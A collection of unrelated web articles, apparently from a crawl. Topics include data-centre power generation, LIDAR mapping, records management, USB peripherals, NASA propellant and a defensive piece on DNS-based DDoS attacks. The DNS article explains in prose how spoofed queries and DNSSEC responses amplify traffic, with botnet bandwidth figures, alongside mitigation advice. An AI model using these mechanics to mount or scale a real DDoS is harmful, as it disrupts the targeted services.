one of the most attractive targets for hackers because they store vast troves of financial data. Retail-related IoT devices will only add to that volume. “Retail environments, like critical sectors, need to go undergo a paradigm shift in network security,” Pore says. “If organizations are only deploying perimeter focused tools to keep threats out, they will likely become the next victim. In addition to traditional technologies such as firewalls, IDS, IPS, and anti-virus, the shift to protecting core assets using analytics needs to be implemented. This can be accomplished using network behavior coupled with indicator correlation to detect threats and undesired behavior. Watching, profiling, and alarming on threshold of critical assets such as point-of-sale machines reaching out to the internet will help organizations from becoming the next headline.”
<urn:uuid:759557fe-116c-4e03-97ca-851280406907>
CC-MAIN-2017-04
http://www.ioti.com/security/10-most-vulnerable-iot-security-targets
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284429.99/warc/CC-MAIN-20170116095124-00149-ip-10-171-10-70.ec2.internal.warc.gz
en
0.960166
5,433
2.5625
3
Energy is the lifeblood of data centers, and as it becomes scarcer and as its cost increases, more companies will consider the feasibility of generating their own power. Although the perceived benefits of on-site power generation—especially with renewable sources like wind and solar—are tempting, the decision to pursue either supplemental or exclusive generation is one that must be made carefully. Why Would a Company Want to Generate Its Own Power? When was the last time your power rate went down? If you’re like most consumers and companies in the U.S. and elsewhere, the answer is either “never” or “I don’t recall.” The increase in energy prices is attributable to a number of factors in the U.S., not the least of which is a spendthrift federal government whose money printing is debasing the value of the dollar. And with few prospects of a reversal of this trend, prices will likely continue to increase, barring an unexpected deflationary event (which the Federal Reserve would likely fight by printing even more money). Another factor is increasing demand worldwide, especially in emerging economies like China and India. Data centers are facing increasing demand for their services, and to meet this demand, they must collectively consume even greater amounts of power. Although energy-efficiency measures are important and should be pursued for both fiscal and environmental reasons, ultimately, they cannot by themselves balance the increasing need for power to meet demand. As the cost of operating (i.e., powering) servers over their lifetimes nears the initial capital cost of purchasing them, energy is quickly becoming the greatest expense that companies face for their data centers. So, what appeal would a company see in generating its own power? If the power comes from a renewable source like solar or wind energy, then the benefits are obvious. These sources contain abundant energy, and tapping them produces less in the way of emissions and other waste products (although manufacturing the equipment poses its own environmental problems). What’s more, they’re free—if you have the equipment to convert them to electricity. Another concern for companies is the need for reliable, high-quality power. Power spikes and other power events can cause service outages and equipment damage in the data center, and the broader power grid is unable to mitigate all such events. Thus, although purchasing power from a utility is simpler in some ways (for instance, it requires essentially nothing in capital costs compared with on-site power generation), it is less than ideal. If one considers the need for UPS and other systems to “clean up” the power produced by utilities, then the capital costs of relying on a utility are really much more than nil. And, of course, some companies may wish to control their own destinies as much as possible. With on-site power generation, a company need not rely on the utility company to respond in the event of a power failure or to explain why rates are going up yet again. The thought of each company (or even just many companies) meeting its own power needs—especially by way of solar, wind or similar renewable sources—sounds really neat. So, when do we get started? Well, after considering the downsides first. On-Site Power: Reversing the Trend of the Last Century The power grid, a network for distributing power to companies and consumers from central power-generation sources, ameliorated a number of difficulties when it was implemented. First, it allowed companies to purchase power instead of having to generate it themselves, enabling these companies to focus on their core business rather than more peripheral matters. Second, it exploited economies of scale by centralizing power generation in fewer, larger locations, rather than a scattering of individual plants. These centralized facilities were able to distribute power to a large number of customers rather than servicing a single company. But the 21st century is seeing something of a reversal of this trend of centralization as power generation goes from a centralized model to more of a hybrid model that relies on greater distribution of power-generation sources. This change involves both consumers and companies, and in many cases, it supplements the power grid (i.e., these smaller sources are integrated into the grid rather than isolated for service to a single location—unused power is sold to the utility and can be used by other customers). Although centralized sources of energy will likely remain the “bread and butter” of electricity pending development of some revolutionary new type of power generation technology, an increase in distributed sources will ease the burden on these larger facilities and may help improve the quality of power locally. For many data centers that are considering on-site power generation, the hybrid approach is likely the best option. Generating all of their own power needs on site is a tall order, and the capital costs of doing so may be too much for small data centers (even though their power needs are less than those of large data centers). A few large companies, and perhaps even fewer smaller ones, may be able to pursue such a large-scale project; most, however, will likely opt for a supplemental approach. On-site power generation will reduce—not eliminate—reliance on the utility company. What Are the Options? The options for on-site power generation that likely come to mind first are solar and wind energy. These sources are universally available—everywhere is illuminated by the sun, and the wind always blows sometimes, at least—making them universally accessible. What’s more, they’re free, except for the capital cost of converting them to electricity and integrating the generated power into the existing infrastructure. But companies have other options as well, some more or less complicated and expensive than others. One of the advantages of solar power is its availability, but it has a striking disadvantage: it is only available for roughly half the day. The solar constant (the amount of electromagnetic radiation incident on the Earth) is approximately 130 watts per square foot. A solar panel, assuming it is 100% efficient for all wavelengths (which is not nearly the case), would have to be nearly 16 square feet to generate an average of one kilowatt of power over the course of a day (including night, when no solar power is generated). Furthermore, this assumes that the panels adjust to maintain the optimum angle with the sun over the entire course of the daytime hours and that weather conditions do not hinder the sun from reaching them. These are many “ifs,” and clearly the amount of power a solar panel can generate is much lower than the extremely optimistic numbers above. Even assuming these numbers are feasible, a megawatt of power would require over a third of an acre of solar panel space—to say nothing about the space in between individual panels. Factoring in the inefficiencies of the panels and other considerations, the required area quickly multiplies. Furthermore, complete reliance on solar energy would require energy storage infrastructure—in other words, some kind of battery system to provide power at night. Solar energy is therefore better used as a supplement rather than an exclusive power source. IT resources are generally most in demand during the day, so solar power infrastructure can help reduce peak power consumption. In cases where power rates increase during times of peak usage or when a customer exceeds some usage level, the use of solar power can yield tremendous savings beyond just the typical cost of power. Wind energy offers similar advantages and disadvantages compared with solar. Like solar, wind energy depends on conditions: wind speed, for instance. In addition, however, robust structures for mounting the windmills and turbines are required, whereas solar panels can be placed at ground level or mounted to existing buildings or other structures. Large wind turbines require open space for construction of the supporting structures and to allow access to strong winds. Although wind, like solar, does not generate emissions, some concerns have arisen regarding their effects on wildlife—particularly birds, which can be killed by the rotating blades. A less noticeable effect is the mining of rare earth elements to create the magnets that allow the turbines to convert energy of motion into electricity. Most of the production of these elements takes place in China, and a lack of environmental regulations in that country have led to tremendous pollution problems. (See a blog post entitled “Isn’t It Ironic: Green Tech Relies on Dirty Mining in China.”) Two other alternatives are fuel cells and natural gas. Natural gas—particularly when readily available, as in the case of the Reno Technology Park (“An Example of Data Center Site Selection: Reno Technology Park”)—is a relatively clean-burning fuel that can be supplied to on-site generation infrastructure to power a data center or other commercial facility. Fuel cells offer a similar (but even cleaner) possibility, although some questions revolve around their safety. Another striking technology that has significant potential is the use of micro nuclear generators, such as that under development by Hyperion Power Generation. These small power plants could be delivered via truck and supply power without refueling for years—even up to a decade. Numerous safeguards are designed to ensure the safety of the product. With proper waste handling, nuclear power—especially in the contained vessels used by Hyperion—can be a very clean alternative to traditional coal power. This type of small but powerful electricity generation technology offers an exciting possibility for companies in the near future. A different alternative is so-called combined heat and power (sometimes called cogeneration). In this case, waste heat left over from power generation is used to, for instance, provide on-site heat, thereby saving the expense of converting generated electricity back into heat elsewhere, or of needing to purchase a separate fuel for heat generation. The Problem of Location Alternative power-generation technologies many times—although not always—face a difficulty with regard to location. Often, prime locations for data centers (such as in cities, where infrastructure, talent pools and other resources are readily available) lack the power capacity for adding large, power-hungry facilities. It is precisely here that supplemental power generation can be of great value; nevertheless, space for wind turbines (for instance) is highly limited or absent. Even solar power has limited potential in such locations owing to a lack of affordable space. On the other hand, remote locations where utility-based power may be more available (owing to less concentrated demand) leave more open space for power-generating infrastructure, but these locations may also be less desirable. A lack of local talent and potentially the need to travel long distances from a company’s headquarters to a data center facility may make such a possibility far less appealing despite its greater capacity for supplementary (or exclusive) power generation. Who Should Generate On-Site Power? Despite its tremendous potential benefits, generating power onsite has a number of glaring drawbacks (some of which are mentioned above), not the least of which is the initial capital cost of installing the needed infrastructure. Of course, smaller companies with smaller data centers may need less power to operate their facilities compared with larger companies, but even speaking proportionally, these companies may be in a poorer position to shell out the startup capital needed to fund such a project. Large companies, although their data centers may require vastly larger amounts of power, may be more capable of producing the necessary capital to implement a large solar array or a number of wind turbines. And, of course, the costs for generating power on site will vary greatly. Does your company need to purchase additional space for solar panels or windmills? How much power capacity do you need? Do you plan on using a battery storage system for excess power generated? Will you need to hire additional staff to support the infrastructure? The answers to such questions can vary significantly depending on the particular company’s needs and expectations for its power system. The type of system and its infrastructure and ongoing costs (typically maintenance for renewable energy sources) will certainly affect the speed with which the company recoups its investment. Generating your own power for your data center is not something that should be jumped into lightly. To be sure, the startup costs will deter many businesses, but in taking steps in this direction, a company should be sure that it wants to add a new set of tasks to its work. Establishing power-generation capabilities means that a company is doing something other than its core business function, and even though the equipment, personnel and maintenance of such a system may be affordable, the distraction could potentially harm business. Thus, a company must consider a variety of factors when choosing whether to pursue on-site power generation to support or supplement its data center. The potential return on investment for on-site power generation depends on a variety of factors, and giving a single number to quantify it would be deceiving. Not every company need consider on-site generation—including even some of those companies that could afford it. In some cases, the best policy is for a company to focus on its core business and let the utility companies focus on theirs: power generation. But with the rising cost of electricity and the growing appetite of data centers for power, the expenses of running an IT operation could eventually reach a tipping point for some companies, thereby making on-site power generation—whether exclusive or supplemental—feasible or even desirable. The history of power generation and distribution is one of consolidation into a few centralized generation facilities that distribute power to consumers, but the interest in distributed power generation—whereby more consumers (corporate and residential) produce smaller amounts of power—offers some resistance to this trend. Distributed sources cannot exploit the economies of scale that larger facilities can, but they offer certain advantages, particularly in the case of companies that need high-quality power. In addition, distributed power generation offers both individuals and companies with sufficient capital an opportunity to help the environment by generating clean power (in the case of solar, wind and even nuclear energy, for example). For companies operating data centers, location may be a significant stumbling block to their ability to generate power onsite. More desirable locations—such as urban centers—generally leave less room for power-generation infrastructure, whereas less desirable locations have more room but do not offer the benefits of, say, urban centers. Article originally posted July 2011 Photo courtesy of www.francehousehunt.com
<urn:uuid:9420edd0-491a-4601-bc7b-d9aaa6ade5a8>
CC-MAIN-2017-04
http://www.datacenterjournal.com/should-i-be-generating-my-own-power-for-my-data-center/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279915.8/warc/CC-MAIN-20170116095119-00545-ip-10-171-10-70.ec2.internal.warc.gz
en
0.948918
2,924
2.765625
3
LIDAR mapping projects explore the fourth dimension - By Patrick Marshall - Mar 14, 2013 Project managers appear to be in consensus about the lessons learned from the first generation of light detection and ranging (LIDAR) mapping, which uses the data gathered from bounced light to create detailed, 3D maps. For one thing, it’s not just three-dimensional. The impacts of man and nature cause changes in topography, including underwater topography. So it's important to rescan periodically, to see how things have changed across the fourth dimension, time. What's more, since the hardware and software continues to improve, and since agencies have come to realize the value of the data, rescans are even more in demand. "We started our collection in 2007, flying at 8,000 feet," said Charles Fritz, director of the International Water Institute, which runs the Red River Basin Decision Information Network. The RRBDIN is mapping chunks of North Dakota, Minnesota and central Canada. "Our spec was we wanted at least one ground point every 1.4 meters of landscape at plus or minus 15 centimeters. With the new technology we can easily get 10 or 11 points per square meter. Think of it as putting on a better and better pair of cheater glasses." The U.S. Army Corps of Engineers currently is on its second LIDAR data-gathering effort covering the nation's shorelines, and has seen how improved technology has broadened the scope of the project. Infrastructure inspections via LIDAR The Army Corps of Engineers manages over 1,000 coastal navigation structures, such as the Kaumalapau Harbor breakwater in Hawaii (pictured above). General monitoring techniques include lidar or photogrammetric surveys, bathymetric sonar surveys, conventional ground surveys, walking inspections, and damage surveys that are more comprehensive than typical field inspections, according to the Corps' Costal and Hydraulics Laboratory. The data is compared to historical data and to standard design methods in order to improve designs. Employing both topographic and bathymetric (working under water) LIDAR in aircraft, the Corp's National Coastal Mapping Program scans the shoreline — including Hawaii, Alaska and the Great Lakes — in a swath 500 meters inland and 1,000 meters offshore. At current funding levels, the team can cover the entire shoreline every five to six years. Chris Macon, technical lead for program, said that the primary purpose of the program has been to track the movement of sand to ensure safe navigation of the country's waterways. "We're finding out how much sand there is, where it is, where is it moving to along the coast and how it is impacting federal navigation projects," Macon said. The airborne bathymetric LIDAR delivers 25-30 centimeters of vertical accuracy, and its maximum penetration is roughly 50 meters in crystal-clear waters, he said. Navigation issues are still the priority, but as LIDAR scanning and analysis has gotten more accurate and applications have proliferated, federal, state and local agencies are asking for more coverage inland. "As our capabilities have grown, adding topographic LIDAR, adding true color imagery and adding hyperspectral imagery, people want more coverage inland," Macon said. In addition to navigation issues, he said, the data is being employed for invasive species mapping, impacts on wetlands and post-hurricane assessments. Beyond collecting better data, LIDAR pioneers agree on the importance of educating and working closely with those who can make the best use of the LIDAR data. "We spend a lot of time talking with our local stakeholders and developing relationships with people throughout the state, letting people know when flights are happening, who can gain from them," said John English, LIDAR data coordinator for Oregon's Department of Geology. "We travel throughout the state on a regular basis, giving presentations and talking about the technology. It's going out to local constituents in different places with different needs and concerns and addressing them directly." Finally, implementers agree that right now the pressing need is for more applications that can make effective use of the data that has already been collected. "The sensor technology to collect the data has reached a point where we have very dense data,” Macon said. "Some people can use the point data and go drive their own products and information from it, but a lot of people don't want to have to do all the analysis and digging into the data to get the information out. That's where we try to help evolve products and provide more information to the users." PREVIOUS: When LIDAR came down to Earth, mapping projects took off NEXT: LIDAR-equipped robots map a city’s interior.
<urn:uuid:efab7f54-1a2a-489f-8ed1-9e4af4ba921d>
CC-MAIN-2017-04
https://gcn.com/articles/2013/03/14/lidar-mapping-explores-fourth-dimension.aspx
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282932.75/warc/CC-MAIN-20170116095122-00085-ip-10-171-10-70.ec2.internal.warc.gz
en
0.94692
988
2.6875
3
According to a recent Arbor Networks report on infrastructure security, the number of DDoS attacks on enterprise DNS servers is on the rise but, despite this, many businesses aren’t taking the steps necessary to protect this vital part of their IT infrastructure. Indeed, while an increasing number of companies experienced customer-impacting DDoS attacks on their DNS servers last year, few businesses admitted to taking formal responsibility for DNS security somewhere within their organization. Additionally, Cisco’s 2014 Annual Security Report reveals how its threat intelligence experts found evidence of corporate networks being misused or compromised in every single case they examined during a recent project on DNS lookups. It’s clear then that DNS-based DDoS attacks are a growing threat, and one that’s being neglected by businesses when DNS security should really be seen as a priority because of the increasing risks. But how exactly do these attacks work? And what can businesses do to protect against them? It’s surprisingly simple to generate a DDoS attacks using an enterprise’s DNS infrastructure. Rather than using their own IP address, attackers send queries to name servers across the internet from a spoofed IP address of their target, and the name servers, in turn, then send back responses. If these responses were around the same size as the queries themselves, this course of action in itself wouldn’t be sufficient to wreak the desired havoc on the target. What’s required is amplification of each of these queries so that they generate a very large response which, since the adoption of DNS security extensions (DNSSEC) and their inherent cryptographic keys and digital signatures, has become increasingly more common. A query of just 44 bytes, for example, sent from a spoofed IP address to a domain that contains DNSSEC records, could return a response of over 4,000 bytes. With a 1Mbps internet connection, an attacker could send in the region of 2,840 44-byte queries per second which would result in replies to the magnitude of 93Mbps being returned to the target server. And, by using a botnet of thousands of computers, the attacker could quickly recruit 10 fellow comrades and deliver 1Gbps of replies to begin incapacitating their target. Most name servers can be modified to recognize that they’re repeatedly being queried for the same data from the same IP address. Open recursive servers however, of which there are estimated to be around 33 million around the world, will accept the same query from the same spoofed IP address again and again, each time sending back responses such as the DNSSEC examples mentioned above. Recognition and prevention So what steps can companies take to combat such attacks? Perhaps most important is learning to recognize when an attack is taking place. Many organizations don’t know what their query load is, so aren’t even aware of when they’re under attack. By using the statistics support built into the DNS software BIND, administrators can analyze their data for query rates, socket errors and other attack indicators. Even if it’s not clear exactly what an attack looks like, monitoring DNS statistics will establish a baseline from which trends and anomalies can quickly be identified. An organization’s internet-facing infrastructure should also be scrutinized for single points of failure not only in external authoritative name servers, but also in switch and router interactions, firewalls, and connections to the Internet. Once identified, the business should then consider whether these vulnerabilities can be effectively eliminated. External authoritative name servers should be broadly geographically distributed wherever possible which will not only help to avoid single points of failure, but will also provide the added advantage of improving response time performance for their closest customers. And, in the face of the huge number of responses resulting from a DDoS attack, it’s worth considering overproviding existing infrastructure, a process that is both inexpensive and easy to trial prior to an incident. Cloud-based DNS providers run name servers of their own in data centers around the world. These can be configured as secondaries for an organization’s own, with data loaded from a master name server designated and managed in-house. It’s worth noting, though, that most of these providers bill for the number of queries received, which will of course increase significantly during a DNS attack. As well as configuring their DNS infrastructures to resist DDoS attacks, organizations should also ensure they don’t become unwitting accomplices in DDoS attacks against others. Unless the company is one of the very few that runs an open recursive name server, it can limit DNS queries to those IP addresses on its internal networks, thereby making sure that only authorized users have access to its recursive name servers. And for those that run authoritative name servers, Response Rate Limiting (RRL), incorporated into BIND name servers, makes it difficult for attackers to amplify queries, stopping responses being sent to a single IP address at any rate higher than a pre-programmed threshold. By understanding how DDoS attacks exploit DNS servers, and recognizing the signs, organizations can take measures to lower the threat on their own infrastructure, and avoid becoming complicit in attacks on others.
<urn:uuid:22a46079-7c92-4def-ade4-6af4ab54daa0>
CC-MAIN-2017-04
https://www.helpnetsecurity.com/2014/02/13/doing-more-to-protect-your-dns-from-ddos/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282932.75/warc/CC-MAIN-20170116095122-00085-ip-10-171-10-70.ec2.internal.warc.gz
en
0.944911
1,065
2.625
3
Santandrea S.,European Space Agency | Gantois K.,European Space Agency | Strauch K.,European Space Agency | Teston F.,European Space Agency | And 6 more authors. Solar Physics | Year: 2013 Within the European Space Agency's (ESA) General Support and Technology Programme (GSTP), the Project for On-Board Autonomy (PROBA) missions provide a platform for in-orbit technology demonstration. Besides the technology demonstration goal, the satellites allow to provide services to, e. g., scientific communities. PROBA1 has been providing multi-spectral imaging data to the Earth observation community for a decade, and PROBA2 provides imaging and irradiance data from our Sun to the solar community. This article gives an overview of the PROBA2 mission history and provides an introduction to the flight segment, the ground segment, and the payload operated onboard. Important aspects of the satellite's design, including onboard software autonomy and the functionality of the navigation and guidance, are discussed. PROBA2 successfully proved again within the GSTP concept that it is possible to provide a fast and cost-efficient satellite design and to combine advanced technology objectives from industry with focussed objectives from the science community. © 2013 Springer Science+Business Media Dordrecht. Source
<urn:uuid:1260d36b-4ee5-4abf-ae53-c53dabf8e80e>
CC-MAIN-2017-04
https://www.linknovate.com/affiliation/directorate-of-human-spaceflight-and-operations-939125/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279189.36/warc/CC-MAIN-20170116095119-00326-ip-10-171-10-70.ec2.internal.warc.gz
en
0.848166
264
2.828125
3
While it is easy to identify areas in which RIM and IT have common purpose and common goals, it is often much more difficult to ensure that the partnership is effective. The following activities will facilitate a true collaborative relationship. Establish a shared language - One area of difficulty is the language we use to describe what we do. The words may be the same, but point to entirely different meanings. For example, in RIM, the word record is defined as Recorded information, regardless of medium or characteristics, made or received by an organization that is evidence of its operations, and has value requiring its retention for a specific period of time. But, for the IT professional, a record refers to a complete set of information and is generally composed of fields of information. Similarly, the word archive has distinct meanings for each profession. For RIM, the term refers to documents created or received by a person or organization and preserved because of their continuing value, often also referred to as historical value. For the IT professional, it is much more common to think of archive as a process of compressing and copying files to a long-term storage medium. Take time to make sure that everyone on the RIM/IT team has the same understanding of terms that are being used in their work together. Does everyone understand what a backup is and what it is used for? Does everyone understand the difference between backups and long-term retention? Does everyone understand information lifecycle management and how it might differ from the records lifecycle? Understand the goals of electronic records management - RIMs primary responsibility is to ensure that a system which captures and receives records can also preserve required record characteristics. This is particularly important since the vast majority of records are now born digital or converted into electronic formats. Ensure electronic records meet tests of evidence - ISO 15489-1, Information and Documentation Records management Part 1: General outlines four tests that must be met for a record to meet the test of evidence. Those characteristics are: Other international and national level standards address various elements of ensuring the tests of evidence can be met through the capture and retention of metadata, controlled processes for records conversion and migration, and the integration of various technologies (e.g., electronic document management systems, electronic records management systems, cloud computing, SaaS, etc.) Capture metadata specific to records management actions - RIM-related metadata aids in the implementation of the organizations information processing activities and records management policies. Proper recordkeeping metadata ensures that records are retrievable, are properly handled throughout the records lifecycle, and assists in maintaining the integrity and authenticity of records. Ensure accessibility of records throughout the lifecycle - ISO 15489-1 makes clear that accessibility to records must be assured throughout the lifecycle of the record. The standard does not preclude organizations from transferring records to nearline or offline storage, but it does require that the records be retrievable and usable throughout their defined records lifecycle. It is a joint responsibility of RIM and IT to ensure that the systems in use provide the necessary levels of protection for personal privacy and corporate information. Methods should be implemented to prevent unauthorized access, tampering, or disposal. Manage disposition of electronic records - Effective recordkeeping programs enforce a records disposition schedule that defines the necessary retention times for various categories of records. Disposition occurs when the pre-determined time period has passed between the creation or capture of a record and the endpoint (date) as specified in the retention schedule. In North America, the term disposition may mean permanent transfer of a record to an historical archive or permanent destruction of the record. Once the disposition is complete, it is important to create an information audit trail of the disposition actions and the authority on which they are based. The audit trail should include: By now it is clear that the roles of RIM and IT professionals converge throughout the information lifecycle. Decisions made by these professionals should align with the companys records management policies as based upon relevant laws, statutes, or regulations. No actions should be taken that would create unnecessary risk to the organization or would negatively impact the content, context, or integrity of the record. But beyond that, what are the key areas for RIM and IT collaboration? To avoid the prospect of boiling the ocean it is important for each organization to assess its unique areas of opportunity and vulnerability to determine the initial focus of the collaborative efforts. But most companies will benefit from first addressing the following areas. Apply retention and disposition rules to electronic records - As we have seen, the requirements for information governance and compliance apply to all record formats. The organizations records retention and disposition policy identifies the length of time the organization will maintain its records. Retention periods will vary by type of record and may extend from a few months to many years, or even permanent retention for some types of records. Since email messages often contain record information, the systems in place for managing email must allow the application of the organizations retention and disposition policy as well. IT and RIM must work together to develop the strategies and protocols that will ensure the organizations retention and disposition rules are followed for the vast array of electronic repositories, such as shared servers, transactional databases, data warehouses, ECM systems, document management systems, etc. Initial discussions between IT and RIM on this topic will likely lead to a need for developing a shared or complementary taxonomy which facilitates retrieval and disposition of records and information. RIM understands the records, the retention and disposition requirements, and how the business units use the information in their conduct of business. IT understands the capabilities and limitations of the systems and storage media in use, as well as the plans and implementation for technology upgrades. Both perspectives must be considered to result in effective records retention and disposition.
<urn:uuid:1b7e510d-0eba-4d80-b61b-769c48e4a85b>
CC-MAIN-2017-04
http://www.cioupdate.com/reports/article.php/11050_3878916_3/strongSpecial-Reportstrong---IT146s-Critical-Partnership-with-Records-Management.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283008.19/warc/CC-MAIN-20170116095123-00352-ip-10-171-10-70.ec2.internal.warc.gz
en
0.939395
1,167
3.171875
3
Port Numbers – How does Transport layer identifies the Conversations Computers are today equipped with the whole range of different applications. Almost all of these applications are able in some way to communicate across the network and use Internet to send and get information, updates or check the correctness of user purchase. Consider they all these applications are in some cases simultaneously receiving and sending e-mail, instant messages, web pages, and a VoIP phone calls. In this situation the computer is using one network connection to get all this communication running. But how is it possible that this computer is never confused about choosing the right application that will receive a particular packet? We are talking about the computer that processes two or more communications in the same time for two or more applications running.
<urn:uuid:64fb3f3f-491f-4531-9f12-0ef730457bf5>
CC-MAIN-2017-04
https://howdoesinternetwork.com/tag/ports
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280133.2/warc/CC-MAIN-20170116095120-00078-ip-10-171-10-70.ec2.internal.warc.gz
en
0.925935
151
3.5625
4
NASA said today it would launch a spacecraft that would for the first time test fire green propellant technology in space. NASA’s Green Propellant Infusion Mission (GPIM) will use a small satellite using a Hydroxyl Ammonium Nitrate fuel/oxidizer mix, developed by the Air Force Research Laboratory, is also is known as AF-M315E propellant. This fuel may replace the highly toxic hydrazine and complex bi-propellant systems in-use today, NASA said. The green propulsion system will fly aboard a Ball Aerospace & Technologies Configurable Platform 100 satellite and is slated for launch on a Space X rocket in 2016. Developed by the Air Force Research Laboratory the green propellant is less harmful to the environment, increases fuel efficiency, and diminishes operational hazards. The propellant offers nearly 50% higher performance for a given propellant tank volume compared to a conventional hydrazine system and will feature a catalyst technology, pioneered by Aerojet Rocketdyne, NASA stated. According to NASA: "Hydrazine is an efficient and ubiquitous propellant that can be stored for long periods of time, but is also highly corrosive and toxic. It is used extensively on commercial and defense department satellites as well as for NASA science and exploration missions. NASA is looking for an alternative that decreases environmental hazards and pollutants, has fewer operational hazards and shortens rocket launch processing times." Check out these other hot stories:
<urn:uuid:31eafe69-20ad-40b1-894c-b2f4fdb3a5ab>
CC-MAIN-2017-04
http://www.networkworld.com/article/2466565/security0/nasa-s-green-rocket-fuel-set-for-major-space-test.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280483.83/warc/CC-MAIN-20170116095120-00564-ip-10-171-10-70.ec2.internal.warc.gz
en
0.919628
299
3.21875
3
Cool Tools: USB Desktop Peripherals and Devices This month, we depart from our normal coverage of key IT technologies to focus on how interesting devices are plugging into business and home desktops nowadays. Let’s explore the many kinds of accessories and gadgets that the Universal Serial Bus (USB) makes possible for modern desktop PCs, notebooks and laptops. Though there are many built-in interfaces that also work to link computers to all kinds of hardware—such as older interfaces like RS-232, parallel printer connections and various forms of slower serial interfaces for a mouse and keyboard—USB has zoomed to the top of the list of most popular standard interfaces. Today, you’ll find it used for everything from mouse and keyboard links to outboard hard disks, network interfaces, so-called pen drives (which use USB and a flash memory card to store data) and more. Basically, USB is a plug-and-play interface that enables computers to recognize and establish links to add-on devices, such as audio players, pointing devices (not just mice, but trackballs, joysticks and so forth), keyboards, scanners, printers, telephones and many types of storage devices. Because USB device drivers know how to register and describe the devices they service to the computers to which they attach, you can usually plug in a new device without requiring a special adapter card or driver software to enable the PC and the device to acknowledge each other. The USB standard resulted from a joint development project that involved vendors like Compaq, HP, IBM, Lucent, Intel, Microsoft, Philips and NEC. This technology is freely available to computer and device vendors, so they can leverage existing code and driver technology without incurring royalty fees. The most current version is USB 2.0, which supports data speeds up to 480 Mbps. Windows has incorporated USB drivers since 1996, and they are built into Windows 98 and all later versions. USB works well for most types of peripheral devices, including audio, video, networking, storage and more. Laundry List: Leading USB Devices USB really covers the gamut of possible applications and uses. But there are USBs that are more likely to be of use to home and office workers, especially those who must travel with laptops and other gear to take work on the road. Though there are many other categories of potential USB link-ups and gear, the following types of items can deliver functionality that’s helpful, if not essential. (The most obvious items—namely keyboards and pointing devices—are not included here, since everybody already knows about and uses them.) USB devices are available that permit PCs to be used as IP telephones. The combination of a USB headset (with earphones and a microphone) and so-called “softphone” software permits travelers to access IP phone service provider servers or Web sites, and to dial or receive calls, handle voicemail, leave messages and do anything that might ordinarily be done with a private telephone system. Numerous free softphone clients are readily available on the Internet, and many IP phone service providers make clients available to their customers at no charge. As long as your notebook or laptop can access the Internet at a reasonable speed (10 Mbps or faster is recommended), softphone software and a good headset make carrying a phone more a convenience than a necessity. As an added bonus, state-of-the-art headsets offer great audio fidelity for listening to music stored on your PC. For those who do carry cell phones and need the occasional charge, you also can purchase USB-attached cell phone chargers. These devices plug into a PC or notebook and grab DC power to recharge cell phone batteries. This isn’t necessarily a mission-critical use for USB, but can be convenient for those who spend too much time with a cell phone glued to their ears. Many USB devices offer additional storage for computers of all kinds. Compact flash drives, for example, integrate a flash memory card and USB interface, and emulate drives for Windows and other operating systems. Capacities of up to 1 GB are now surprisingly affordable, with recent prices for 1 GB hovering in the $70 to $80 range. Many vendors now give 16 or 32 MB flash drives away to distribute their software rather than using CDs or diskettes. Some vendors even offer USB drives of this type that use 1-inch form-factor hard disks rather than memory cards of some kind to deliver up to 2 GB of storage in this small, convenient and highly portable format. For larger storage volumes, many vendors—including well-known storage providers like Seagate, Maxtor, Western Digital and Iomega—offer external hard disks that provide up to 400 GB of disk space, typically for less than $300. Most of these devices incorporate standard 3.5-inch form-factor EIDE or ATA drives. Many support both high-speed USB 2.0 and Firewire (IEEE 1394) interfaces, so they run as fast as locally attached drives. Some enclosures include additional USB ports so they also can act as USB hubs (or accommodate other external drives). Many vendors bundle backup software with these drives because they’re frequently used for backing systems up. Smaller form-factor drives of this type also are available—usually known as portable USB drives—specifically to make extra storage and easy backup possible for notebook and laptop users. Those who seek to maximize their return on hardware expenses can save money by buying bare 3.5-inch EIDE or ATA drives (now available in sizes up to 400 GB, with a 200 GB drive typically available for around $100), purchasing their own external harddrive enclosures (generally available for between $40 and $80) and assembling them on their own. If you can use a screwdriver, know how to snap disk-drive cables together and can follow simple instructions, you can save up to 50 percent off the cost of an equivalent preassembled external USB drive. USB makes everything from MP3 and other personal music players to high-end external sound cards and interfaces accessible to PCs and laptops. This kind of capability is especially useful for small form-factor PCs, notebooks and laptops, where built-in audio may not be good enough for some needs or situations, but where there’s no room (or interfaces) for adding internal sound cards. It’s even possible to buy special interface devices that attach to a PC through USB and into entertainment systems using optical, RCA or S-Video connections. Video and Photos Many digital video cameras and most digital cameras use USB to move photos or movies from the capture device (the camera) to a storage and editing device (the PC). Where digital cameras, music players or other devices that use compact solid-state memory cards are concerned, it’s also possible to purchase USB card readers as well. To get photos from your camera to your PC, remove the memory card from the camera, plug it into the reader and use your local file system to copy the image files from the card to a hard drive (or vice versa) and to delete unwanted photos from the card before returning it back to the camera. Six-in-one readers are commonly available for less than $10, and a 16-in-one reader costs less than $20. (A six-in-one reader can handle six different types of memory cards or sticks, whereas a 16-in-one reader handles 16 types, or nearly every such type currently available.) Networking and Internet Links There are lots of ways to network PCs using USB. Both wired and wireless USB-based network interfaces for various versions of Ethernet are available, including 10/100 wired Ethernet, various forms of 802.11 (b and g are the most common, at 11 and 54 Mbps respectively) and even wired or fiber-optic Gigabit Ethernet link-ups. Lots of Internet appliances (which often combine hook-ups for DSL and cable modem Internet links with wired or wireless networ
<urn:uuid:673f038a-a8ef-4021-85d8-cafc8ec89d4b>
CC-MAIN-2017-04
http://certmag.com/cool-tools-usb-desktop-peripherals-and-devices/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283475.86/warc/CC-MAIN-20170116095123-00196-ip-10-171-10-70.ec2.internal.warc.gz
en
0.931415
1,638
2.578125
3
